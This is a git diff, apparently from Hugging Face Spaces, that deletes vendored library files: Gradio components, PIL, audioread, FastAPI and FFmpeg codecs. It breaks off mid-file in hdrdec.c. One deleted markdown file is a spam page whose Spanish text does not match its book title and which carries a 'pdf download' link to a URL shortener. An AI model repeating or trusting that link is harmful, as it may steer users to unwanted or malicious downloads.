a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py deleted file mode 100644 index f379badbead20c8de7afeae040a4dc8591e53da2..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py +++ /dev/null @@ -1,193 +0,0 @@ -"""gr.Radio() component.""" - -from __future__ import annotations - -from typing import Any, Callable, Literal - -from gradio_client.documentation import document, set_documentation_group -from gradio_client.serializing import StringSerializable - -from gradio.components.base import FormComponent, IOComponent, _Keywords -from gradio.deprecation import warn_deprecation, warn_style_method_deprecation -from gradio.events import Changeable, EventListenerMethod, Inputable, Selectable -from gradio.interpretation import NeighborInterpretable - -set_documentation_group("component") - - -@document() -class Radio( - FormComponent, - Selectable, - Changeable, - Inputable, - IOComponent, - StringSerializable, - NeighborInterpretable, -): - """ - Creates a set of radio buttons of which only one can be selected. - Preprocessing: passes the value of the selected radio button as a {str} or its index as an {int} into the function, depending on `type`. - Postprocessing: expects a {str} corresponding to the value of the radio button to be selected. - Examples-format: a {str} representing the radio option to select. - - Demos: sentence_builder, titanic_survival, blocks_essay - """ - - def __init__( - self, - choices: list[str] | None = None, - *, - value: str | Callable | None = None, - type: str = "value", - label: str | None = None, - info: str | None = None, - every: float | None = None, - show_label: bool = True, - container: bool = True, - scale: int | None = None, - min_width: int = 160, - interactive: bool | None = None, - visible: bool = True, - elem_id: str | None = None, - elem_classes: list[str] | str | None = None, - **kwargs, - ): - """ - Parameters: - choices: list of options to select from. - value: the button selected by default. If None, no button is selected by default. If callable, the function will be called whenever the app loads to set the initial value of the component. - type: Type of value to be returned by component. "value" returns the string of the choice selected, "index" returns the index of the choice selected. - label: component name in interface. - info: additional component description. - every: If `value` is a callable, run the function 'every' number of seconds while the client connection is open. Has no effect otherwise. Queue must be enabled. The event can be accessed (e.g. to cancel it) via this component's .load_event attribute. - show_label: if True, will display label. - container: If True, will place the component in a container - providing some extra padding around the border. - scale: relative width compared to adjacent Components in a Row. For example, if Component A has scale=2, and Component B has scale=1, A will be twice as wide as B. Should be an integer. - min_width: minimum pixel width, will wrap if not sufficient screen space to satisfy this value. If a certain scale value results in this Component being narrower than min_width, the min_width parameter will be respected first. - interactive: if True, choices in this radio group will be selectable; if False, selection will be disabled. If not provided, this is inferred based on whether the component is used as an input or output. - visible: If False, component will be hidden. - elem_id: An optional string that is assigned as the id of this component in the HTML DOM. Can be used for targeting CSS styles. - elem_classes: An optional list of strings that are assigned as the classes of this component in the HTML DOM. Can be used for targeting CSS styles. - """ - self.choices = choices or [] - valid_types = ["value", "index"] - if type not in valid_types: - raise ValueError( - f"Invalid value for parameter `type`: {type}. Please choose from one of: {valid_types}" - ) - self.type = type - self.select: EventListenerMethod - """ - Event listener for when the user selects Radio option. - Uses event data gradio.SelectData to carry `value` referring to label of selected option, and `index` to refer to index. - See EventData documentation on how to use this event data. - """ - IOComponent.__init__( - self, - label=label, - info=info, - every=every, - show_label=show_label, - container=container, - scale=scale, - min_width=min_width, - interactive=interactive, - visible=visible, - elem_id=elem_id, - elem_classes=elem_classes, - value=value, - **kwargs, - ) - NeighborInterpretable.__init__(self) - - def get_config(self): - return { - "choices": self.choices, - "value": self.value, - **IOComponent.get_config(self), - } - - def example_inputs(self) -> dict[str, Any]: - return { - "raw": self.choices[0] if self.choices else None, - "serialized": self.choices[0] if self.choices else None, - } - - @staticmethod - def update( - value: Any | Literal[_Keywords.NO_VALUE] | None = _Keywords.NO_VALUE, - choices: list[str] | None = None, - label: str | None = None, - info: str | None = None, - show_label: bool | None = None, - container: bool | None = None, - scale: int | None = None, - min_width: int | None = None, - interactive: bool | None = None, - visible: bool | None = None, - ): - return { - "choices": choices, - "label": label, - "info": info, - "show_label": show_label, - "container": container, - "scale": scale, - "min_width": min_width, - "interactive": interactive, - "visible": visible, - "value": value, - "__type__": "update", - } - - def preprocess(self, x: str | None) -> str | int | None: - """ - Parameters: - x: selected choice - Returns: - selected choice as string or index within choice list - """ - if self.type == "value": - return x - elif self.type == "index": - if x is None: - return None - else: - return self.choices.index(x) - else: - raise ValueError( - f"Unknown type: {self.type}. Please choose from: 'value', 'index'." - ) - - def get_interpretation_neighbors(self, x): - choices = list(self.choices) - choices.remove(x) - return choices, {} - - def get_interpretation_scores( - self, x, neighbors, scores: list[float | None], **kwargs - ) -> list: - """ - Returns: - Each value represents the interpretation score corresponding to each choice. - """ - scores.insert(self.choices.index(x), None) - return scores - - def style( - self, - *, - item_container: bool | None = None, - container: bool | None = None, - **kwargs, - ): - """ - This method is deprecated. Please set these arguments in the constructor instead. - """ - warn_style_method_deprecation() - if item_container is not None: - warn_deprecation("The `item_container` parameter is deprecated.") - if container is not None: - self.container = container - return self diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py deleted file mode 100644 index 9014b4e24ea2987d05dcf6ad58a6f0ee437646de..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py +++ /dev/null @@ -1,175 +0,0 @@ -from __future__ import annotations - -import argparse -import os -import re - -import huggingface_hub - -import gradio as gr - -repo_directory = os.getcwd() -readme_file = os.path.join(repo_directory, "README.md") -github_action_template = os.path.join( - os.path.dirname(__file__), "deploy_space_action.yaml" -) - - -def add_configuration_to_readme( - title: str | None, - app_file: str | None, -) -> dict: - configuration = {} - - dir_name = os.path.basename(repo_directory) - if title is None: - title = input(f"Enter Spaces app title [{dir_name}]: ") or dir_name - formatted_title = format_title(title) - if formatted_title != title: - print(f"Formatted to {formatted_title}. ") - configuration["title"] = formatted_title - - if app_file is None: - for file in os.listdir(repo_directory): - file_path = os.path.join(repo_directory, file) - if not os.path.isfile(file_path) or not file.endswith(".py"): - continue - - with open(file_path, encoding="utf-8", errors="ignore") as f: - content = f.read() - if "import gradio" in content: - app_file = file - break - - app_file = ( - input(f"Enter Gradio app file {f'[{app_file}]' if app_file else ''}: ") - or app_file - ) - if not app_file or not os.path.exists(app_file): - raise FileNotFoundError("Failed to find Gradio app file.") - configuration["app_file"] = app_file - - configuration["sdk"] = "gradio" - configuration["sdk_version"] = gr.__version__ - huggingface_hub.metadata_save(readme_file, configuration) - - configuration["hardware"] = ( - input( - f"Enter Spaces hardware ({', '.join(hardware.value for hardware in huggingface_hub.SpaceHardware)}) [cpu-basic]: " - ) - or "cpu-basic" - ) - - secrets = {} - if input("Any Spaces secrets (y/n) [n]: ") == "y": - while True: - secret_name = input("Enter secret name (leave blank to end): ") - if not secret_name: - break - secret_value = input(f"Enter secret value for {secret_name}: ") - secrets[secret_name] = secret_value - configuration["secrets"] = secrets - - requirements_file = os.path.join(repo_directory, "requirements.txt") - if ( - not os.path.exists(requirements_file) - and input("Create requirements.txt file? (y/n) [n]: ").lower() == "y" - ): - while True: - requirement = input("Enter a dependency (leave blank to end): ") - if not requirement: - break - with open(requirements_file, "a") as f: - f.write(requirement + "\n") - - if ( - input( - "Create Github Action to automatically update Space on 'git push'? [n]: " - ).lower() - == "y" - ): - track_branch = input("Enter branch to track [main]: ") or "main" - github_action_file = os.path.join( - repo_directory, ".github/workflows/update_space.yml" - ) - os.makedirs(os.path.dirname(github_action_file), exist_ok=True) - with open(github_action_template) as f: - github_action_content = f.read() - github_action_content = github_action_content.replace("$branch", track_branch) - with open(github_action_file, "w") as f: - f.write(github_action_content) - - print( - "Github Action created. Add your Hugging Face write token (from https://huggingface.co/settings/tokens) as an Actions Secret named 'hf_token' to your GitHub repository. This can be set in your repository's settings page." - ) - - return configuration - - -def format_title(title: str): - title = title.replace(" ", "_") - title = re.sub(r"[^a-zA-Z0-9\-._]", "", title) - title = re.sub("-+", "-", title) - while title.startswith("."): - title = title[1:] - return title - - -def deploy(): - if ( - os.getenv("SYSTEM") == "spaces" - ): # in case a repo with this function is uploaded to spaces - return - parser = argparse.ArgumentParser(description="Deploy to Spaces") - parser.add_argument("deploy") - parser.add_argument("--title", type=str, help="Spaces app title") - parser.add_argument("--app-file", type=str, help="File containing the Gradio app") - - args = parser.parse_args() - - hf_api = huggingface_hub.HfApi() - whoami = None - login = False - try: - whoami = hf_api.whoami() - if whoami["auth"]["accessToken"]["role"] != "write": - login = True - except OSError: - login = True - if login: - print("Need 'write' access token to create a Spaces repo.") - huggingface_hub.login(add_to_git_credential=False) - whoami = hf_api.whoami() - - configuration: None | dict = None - if os.path.exists(readme_file): - try: - configuration = huggingface_hub.metadata_load(readme_file) - except ValueError: - pass - - if configuration is None: - print( - f"Creating new Spaces Repo in '{repo_directory}'. Collecting metadata, press Enter to accept default value." - ) - configuration = add_configuration_to_readme( - args.title, - args.app_file, - ) - - space_id = huggingface_hub.create_repo( - configuration["title"], - space_sdk="gradio", - repo_type="space", - exist_ok=True, - space_hardware=configuration.get("hardware"), - ).repo_id - hf_api.upload_folder( - repo_id=space_id, - repo_type="space", - folder_path=repo_directory, - ) - if configuration.get("secrets"): - for secret_name, secret_value in configuration["secrets"].items(): - huggingface_hub.add_space_secret(space_id, secret_name, secret_value) - print(f"Space available at https://huggingface.co/spaces/{space_id}") diff --git a/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md b/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md deleted file mode 100644 index 36c5c0fe745c439847e66cfb523d08fd656b51ab..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md +++ /dev/null @@ -1,6 +0,0 @@ -
    -

    Cuando hablamos de los estadios de conciencia, la Teoría Integral diferencia entre las lentas estructuras evolutivas/estados -que se muestran en los gráficos anteriores-, y los estadios de estado, de acceso rápido y, a menudo, volátiles. Lleva años desarrollar estos niveles de conciencia, y si alguien alcanza un determinado nivel, se pasará en él una buena fase de su vida. Pensemos en una persona tradicional (con altitud ámbar en el modelo integral) o moderna (nivel naranja), pueden debatir durante años durante la sobremesa sin llegar a entenderse. Esos estadios, que conllevan su propia visión del mundo, necesitan tiempo para cambiar. Por otra parte, cualquiera puede experimentar una experiencia cumbre o entrar en un estado espiritual de manera relativamente rápida. Durante minutos, horas o días -dependiendo de la práctica y la capacidad de la persona- cualquier persona en estadio tradicional, moderno, postmoderno o integral, puede entrar en un estado no ordinario de conciencia. La llamada rejilla Wilber-Combs muestra esta diferencia, describiendo las estructuras-estadios (en el eje vertical) y los estadios de estado (en el eje horizontal). Comparando la estructura profunda de las diferentes experiencias descritas en las tradiciones espirituales principales, Wilber afirma que los estados de conciencia también atraviesan estadios de creciente profundización (apertura o despertar). Él define 4 de estos estadios de estado: el ordinario, sutil, causal y no-dual.

    -

    Observa, cómo el número de uno de los peldaños de la escalera en un cuadrante, corresponde con el mismo número de estadio en el otro. Y también cómo la psicología individual (superior izquierdo), las visiones del mundo, las orientaciones políticas (inferior izquierdo) y los sistemas sociales (inferior derecho) se unen. Por ejemplo, el número 5 en el cuadrante superior izquierdo es el yo racional moderno, hecho a sí mismo e independiente, que marcamos con el color naranja. El nivel naranja. Este estadio de desarrollo en la evolución tiene una visión del mundo científico-racional, que puede verse en el cuadrante inferior izquierdo, en el estadio 5. Este mismo estadio produce estados empresariales, como ha sido el caso a nivel mundial, cuando la Ilustración Occidental reemplazó a los imperios de la Edad Media feudal; o en el caso de la colonización de las actividades de las naciones naranjas en otras partes del mundo, como los Británicos en la India, por ejemplo. Todos los estados de las naciones modernas cobraron vida cuando apareció el nivel naranja.

    -

    el nacimiento del mundo moderno pdf download


    DOWNLOAD ->->->-> https://tinurli.com/2uwkgK



    aaccfb2cb3
    -
    -
    \ No newline at end of file diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py deleted file mode 100644 index 17c008b9a6a1218f6e51add4fda83acb92ee06ce..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py +++ /dev/null @@ -1,75 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# Basic McIdas support for PIL -# -# History: -# 1997-05-05 fl Created (8-bit images only) -# 2009-03-08 fl Added 16/32-bit support. -# -# Thanks to Richard Jones and Craig Swank for specs and samples. -# -# Copyright (c) Secret Labs AB 1997. -# Copyright (c) Fredrik Lundh 1997. -# -# See the README file for information on usage and redistribution. -# - -import struct - -from . import Image, ImageFile - - -def _accept(s): - return s[:8] == b"\x00\x00\x00\x00\x00\x00\x00\x04" - - -## -# Image plugin for McIdas area images. - - -class McIdasImageFile(ImageFile.ImageFile): - format = "MCIDAS" - format_description = "McIdas area file" - - def _open(self): - # parse area file directory - s = self.fp.read(256) - if not _accept(s) or len(s) != 256: - msg = "not an McIdas area file" - raise SyntaxError(msg) - - self.area_descriptor_raw = s - self.area_descriptor = w = [0] + list(struct.unpack("!64i", s)) - - # get mode - if w[11] == 1: - mode = rawmode = "L" - elif w[11] == 2: - # FIXME: add memory map support - mode = "I" - rawmode = "I;16B" - elif w[11] == 4: - # FIXME: add memory map support - mode = "I" - rawmode = "I;32B" - else: - msg = "unsupported McIdas format" - raise SyntaxError(msg) - - self.mode = mode - self._size = w[10], w[9] - - offset = w[34] + w[15] - stride = w[15] + w[10] * w[11] * w[14] - - self.tile = [("raw", (0, 0) + self.size, offset, (rawmode, stride, 1))] - - -# -------------------------------------------------------------------- -# registry - -Image.register_open(McIdasImageFile.format, McIdasImageFile, _accept) - -# no default extension diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py deleted file mode 100644 index 8230e246f18879faa9d9649ceafee22499e6cb8b..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py +++ /dev/null @@ -1,18 +0,0 @@ -# This file is part of audioread. -# Copyright 2021, Adrian Sampson. -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. - - -class AudioFile: - """The base class for all audio file types. - """ diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py deleted file mode 100644 index c0a13b7555efc9d99c5c887fee1c94c88ba7e89c..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py +++ /dev/null @@ -1,34 +0,0 @@ -from typing import Any - -from starlette.responses import FileResponse as FileResponse # noqa -from starlette.responses import HTMLResponse as HTMLResponse # noqa -from starlette.responses import JSONResponse as JSONResponse # noqa -from starlette.responses import PlainTextResponse as PlainTextResponse # noqa -from starlette.responses import RedirectResponse as RedirectResponse # noqa -from starlette.responses import Response as Response # noqa -from starlette.responses import StreamingResponse as StreamingResponse # noqa - -try: - import ujson -except ImportError: # pragma: nocover - ujson = None # type: ignore - - -try: - import orjson -except ImportError: # pragma: nocover - orjson = None # type: ignore - - -class UJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert ujson is not None, "ujson must be installed to use UJSONResponse" - return ujson.dumps(content, ensure_ascii=False).encode("utf-8") - - -class ORJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert orjson is not None, "orjson must be installed to use ORJSONResponse" - return orjson.dumps( - content, option=orjson.OPT_NON_STR_KEYS | orjson.OPT_SERIALIZE_NUMPY - ) diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c deleted file mode 100644 index f2e155fc99d1a4182e54a98d1926cfa9678fa30f..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c +++ /dev/null @@ -1,81 +0,0 @@ -/* - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "config.h" - -#include -#include - -#include "adts_header.h" -#include "adts_parser.h" - -int av_adts_header_parse(const uint8_t *buf, uint32_t *samples, uint8_t *frames) -{ -#if CONFIG_ADTS_HEADER - GetBitContext gb; - AACADTSHeaderInfo hdr; - int err = init_get_bits8(&gb, buf, AV_AAC_ADTS_HEADER_SIZE); - if (err < 0) - return err; - err = ff_adts_header_parse(&gb, &hdr); - if (err < 0) - return err; - *samples = hdr.samples; - *frames = hdr.num_aac_frames; - return 0; -#else - return AVERROR(ENOSYS); -#endif -} - -int avpriv_adts_header_parse(AACADTSHeaderInfo **phdr, const uint8_t *buf, size_t size) -{ -#if CONFIG_ADTS_HEADER - int ret = 0; - int allocated = 0; - GetBitContext gb; - - if (!phdr || !buf || size < AV_AAC_ADTS_HEADER_SIZE) - return AVERROR_INVALIDDATA; - - if (!*phdr) { - allocated = 1; - *phdr = av_mallocz(sizeof(AACADTSHeaderInfo)); - } - if (!*phdr) - return AVERROR(ENOMEM); - - ret = init_get_bits8(&gb, buf, AV_AAC_ADTS_HEADER_SIZE); - if (ret < 0) { - if (allocated) - av_freep(phdr); - return ret; - } - - ret = ff_adts_header_parse(&gb, *phdr); - if (ret < 0) { - if (allocated) - av_freep(phdr); - return ret; - } - - return 0; -#else - return AVERROR(ENOSYS); -#endif -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c deleted file mode 100644 index a357d3167207b5d47d3bb24933b5c8a53c32021b..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c +++ /dev/null @@ -1,159 +0,0 @@ -/* - * Bink DSP routines - * Copyright (c) 2009 Konstantin Shishkov - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * Bink DSP routines - */ - -#include "config.h" -#include "libavutil/attributes.h" -#include "binkdsp.h" - -#define A1 2896 /* (1/sqrt(2))<<12 */ -#define A2 2217 -#define A3 3784 -#define A4 -5352 - -#define MUL(X,Y) ((int)((unsigned)(X) * (Y)) >> 11) - -#define IDCT_TRANSFORM(dest,s0,s1,s2,s3,s4,s5,s6,s7,d0,d1,d2,d3,d4,d5,d6,d7,munge,src) {\ - const int a0 = (src)[s0] + (src)[s4]; \ - const int a1 = (src)[s0] - (src)[s4]; \ - const int a2 = (src)[s2] + (src)[s6]; \ - const int a3 = MUL(A1, (src)[s2] - (src)[s6]); \ - const int a4 = (src)[s5] + (src)[s3]; \ - const int a5 = (src)[s5] - (src)[s3]; \ - const int a6 = (src)[s1] + (src)[s7]; \ - const int a7 = (src)[s1] - (src)[s7]; \ - const int b0 = a4 + a6; \ - const int b1 = MUL(A3, a5 + a7); \ - const int b2 = MUL(A4, a5) - b0 + b1; \ - const int b3 = MUL(A1, a6 - a4) - b2; \ - const int b4 = MUL(A2, a7) + b3 - b1; \ - (dest)[d0] = munge(a0+a2 +b0); \ - (dest)[d1] = munge(a1+a3-a2+b2); \ - (dest)[d2] = munge(a1-a3+a2+b3); \ - (dest)[d3] = munge(a0-a2 -b4); \ - (dest)[d4] = munge(a0-a2 +b4); \ - (dest)[d5] = munge(a1-a3+a2-b3); \ - (dest)[d6] = munge(a1+a3-a2-b2); \ - (dest)[d7] = munge(a0+a2 -b0); \ -} -/* end IDCT_TRANSFORM macro */ - -#define MUNGE_NONE(x) (x) -#define IDCT_COL(dest,src) IDCT_TRANSFORM(dest,0,8,16,24,32,40,48,56,0,8,16,24,32,40,48,56,MUNGE_NONE,src) - -#define MUNGE_ROW(x) (((x) + 0x7F)>>8) -#define IDCT_ROW(dest,src) IDCT_TRANSFORM(dest,0,1,2,3,4,5,6,7,0,1,2,3,4,5,6,7,MUNGE_ROW,src) - -static inline void bink_idct_col(int *dest, const int32_t *src) -{ - if ((src[8]|src[16]|src[24]|src[32]|src[40]|src[48]|src[56])==0) { - dest[0] = - dest[8] = - dest[16] = - dest[24] = - dest[32] = - dest[40] = - dest[48] = - dest[56] = src[0]; - } else { - IDCT_COL(dest, src); - } -} - -static void bink_idct_c(int32_t *block) -{ - int i; - int temp[64]; - - for (i = 0; i < 8; i++) - bink_idct_col(&temp[i], &block[i]); - for (i = 0; i < 8; i++) { - IDCT_ROW( (&block[8*i]), (&temp[8*i]) ); - } -} - -static void bink_idct_add_c(uint8_t *dest, int linesize, int32_t *block) -{ - int i, j; - - bink_idct_c(block); - for (i = 0; i < 8; i++, dest += linesize, block += 8) - for (j = 0; j < 8; j++) - dest[j] += block[j]; -} - -static void bink_idct_put_c(uint8_t *dest, int linesize, int32_t *block) -{ - int i; - int temp[64]; - for (i = 0; i < 8; i++) - bink_idct_col(&temp[i], &block[i]); - for (i = 0; i < 8; i++) { - IDCT_ROW( (&dest[i*linesize]), (&temp[8*i]) ); - } -} - -static void scale_block_c(const uint8_t src[64]/*align 8*/, uint8_t *dst/*align 8*/, int linesize) -{ - int i, j; - uint16_t *dst1 = (uint16_t *) dst; - uint16_t *dst2 = (uint16_t *)(dst + linesize); - - for (j = 0; j < 8; j++) { - for (i = 0; i < 8; i++) { - dst1[i] = dst2[i] = src[i] * 0x0101; - } - src += 8; - dst1 += linesize; - dst2 += linesize; - } -} - -static void add_pixels8_c(uint8_t *av_restrict pixels, int16_t *block, - int line_size) -{ - int i; - - for (i = 0; i < 8; i++) { - pixels[0] += block[0]; - pixels[1] += block[1]; - pixels[2] += block[2]; - pixels[3] += block[3]; - pixels[4] += block[4]; - pixels[5] += block[5]; - pixels[6] += block[6]; - pixels[7] += block[7]; - pixels += line_size; - block += 8; - } -} - -av_cold void ff_binkdsp_init(BinkDSPContext *c) -{ - c->idct_add = bink_idct_add_c; - c->idct_put = bink_idct_put_c; - c->scale_block = scale_block_c; - c->add_pixels8 = add_pixels8_c; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h deleted file mode 100644 index ea36feb0a2a4e792466962e7d464c041d8a7b37b..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h +++ /dev/null @@ -1,95 +0,0 @@ -/* - * VC3/DNxHD decoder. - * Copyright (c) 2007 SmartJog S.A., Baptiste Coudurier - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#ifndef AVCODEC_DNXHDDATA_H -#define AVCODEC_DNXHDDATA_H - -#include -#include "avcodec.h" -#include "libavutil/attributes.h" -#include "libavutil/intreadwrite.h" -#include "libavutil/rational.h" - -/** Additional profile info flags */ -#define DNXHD_INTERLACED (1<<0) -#define DNXHD_MBAFF (1<<1) -#define DNXHD_444 (1<<2) - -/** Frame headers, extra 0x00 added to end for parser */ -#define DNXHD_HEADER_INITIAL 0x000002800100 -#define DNXHD_HEADER_444 0x000002800200 - -/** Indicate that a CIDEntry value must be read in the bitstream */ -#define DNXHD_VARIABLE 0 - -typedef struct CIDEntry { - int cid; - unsigned int width, height; - unsigned int frame_size; - unsigned int coding_unit_size; - uint16_t flags; - int index_bits; - int bit_depth; - int eob_index; - const uint8_t *luma_weight, *chroma_weight; - const uint8_t *dc_codes, *dc_bits; - const uint16_t *ac_codes; - const uint8_t *ac_bits, *ac_info; - const uint16_t *run_codes; - const uint8_t *run_bits, *run; - int bit_rates[5]; ///< Helper to choose variants, rounded to nearest 5Mb/s - AVRational packet_scale; -} CIDEntry; - -const CIDEntry *ff_dnxhd_get_cid_table(int cid); -int ff_dnxhd_find_cid(AVCodecContext *avctx, int bit_depth); -void ff_dnxhd_print_profiles(AVCodecContext *avctx, int loglevel); - -static av_always_inline uint64_t ff_dnxhd_check_header_prefix_hr(uint64_t prefix) -{ - uint64_t data_offset = prefix >> 16; - if ((prefix & 0xFFFF0000FFFFLL) == 0x0300 && - data_offset >= 0x0280 && data_offset <= 0x2170 && - (data_offset & 3) == 0) - return prefix; - return 0; -} - -static av_always_inline uint64_t ff_dnxhd_check_header_prefix(uint64_t prefix) -{ - if (prefix == DNXHD_HEADER_INITIAL || - prefix == DNXHD_HEADER_444 || - ff_dnxhd_check_header_prefix_hr(prefix)) - return prefix; - return 0; -} - -static av_always_inline uint64_t ff_dnxhd_parse_header_prefix(const uint8_t *buf) -{ - uint64_t prefix = AV_RB32(buf); - prefix = (prefix << 16) | buf[4] << 8; - return ff_dnxhd_check_header_prefix(prefix); -} - -int ff_dnxhd_get_frame_size(int cid); -int ff_dnxhd_get_hr_frame_size(int cid, int w, int h); - -#endif /* AVCODEC_DNXHDDATA_H */ diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c deleted file mode 100644 index 998227744b3f3c7d8e0a5d371156264fe17a25bd..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c +++ /dev/null @@ -1,231 +0,0 @@ -/* - * Radiance HDR image format - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "avcodec.h" -#include "bytestream.h" -#include "codec_internal.h" -#include "decode.h" -#include "thread.h" - -#define MINELEN 8 -#define MAXELEN 0x7fff - -static int hdr_get_line(GetByteContext *gb, uint8_t *buffer, int size) -{ - int n = 0, c; - - memset(buffer, 0, size); - - do { - c = bytestream2_get_byte(gb); - if (n < size - 1) - buffer[n++] = c; - } while (bytestream2_get_bytes_left(gb) > 0 && c != '\n'); - - return 0; -} - -static float convert(int expo, int val) -{ - if (expo == -128) { - return 0.f; - } else { - const float v = val / 256.f; - - return ldexpf(v, expo); - } -} - -static int decompress(uint8_t *scanline, int w, GetByteContext *gb, const uint8_t *start) -{ - int rshift = 0; - - while (w > 0) { - if (bytestream2_get_bytes_left(gb) < 4) - return AVERROR_INVALIDDATA; - scanline[0] = bytestream2_get_byte(gb); - scanline[1] = bytestream2_get_byte(gb); - scanline[2] = bytestream2_get_byte(gb); - scanline[3] = bytestream2_get_byte(gb); - - if (scanline[0] == 1 && - scanline[1] == 1 && - scanline[2] == 1) { - int run = scanline[3]; - for (int i = run << rshift; i > 0 && w > 0 && scanline >= start + 4; i--) { - memcpy(scanline, scanline - 4, 4); - scanline += 4; - w -= 4; - } - rshift += 8; - if (rshift > 16) - break; - } else { - scanline += 4; - w--; - rshift = 0; - } - } - - return 1; -} - -static int hdr_decode_frame(AVCodecContext *avctx, AVFrame *p, - int *got_frame, AVPacket *avpkt) -{ - int width = 0, height = 0; - GetByteContext gb; - uint8_t line[512]; - float sar; - int ret; - - bytestream2_init(&gb, avpkt->data, avpkt->size); - hdr_get_line(&gb, line, sizeof(line)); - if (memcmp("#?RADIANCE\n", line, 11)) - return AVERROR_INVALIDDATA; - - do { - 